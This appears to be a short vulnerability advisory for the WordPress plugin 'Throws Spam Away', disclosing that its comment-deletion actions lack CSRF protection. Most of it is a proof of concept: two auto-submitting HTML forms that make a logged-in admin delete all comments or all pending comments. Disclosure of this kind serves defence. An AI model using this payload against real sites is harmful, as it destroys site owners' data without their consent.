The plugin does not have CSRF checks in place when deleting comments (either all, spam, or pending), allowing attackers to make a logged in admin delete comments via a CSRF attack
To delete all comments <form id="test" action="https://example.com/wp-admin/admin.php?page=throws-spam-away%2Fthrows_spam_away_comments.php" method="POST"> <input type="text" name="c_all" value="a"> <input type="text" name="all" value="a"> <input type="text" name="Submit" value="Delete all Comments"> </form> <script> document.getElementById("test").submit(); </script> <form id="test" action="https://example.com/wp-admin/admin.php?page=throws-spam-away%2Fthrows_spam_away_comments.php" method="POST"> <input type="text" name="c_pend" value="p"> <input type="text" name="pend" value="p"> <input type="text" name="Submit" value="Delete all pending Comments"> </form> <script> document.getElementById("test").submit(); </script>
Daniel Ruf
Daniel Ruf
Yes
2022-05-16 (about 1 years ago)
2022-05-16 (about 1 years ago)
2022-05-16 (about 1 years ago)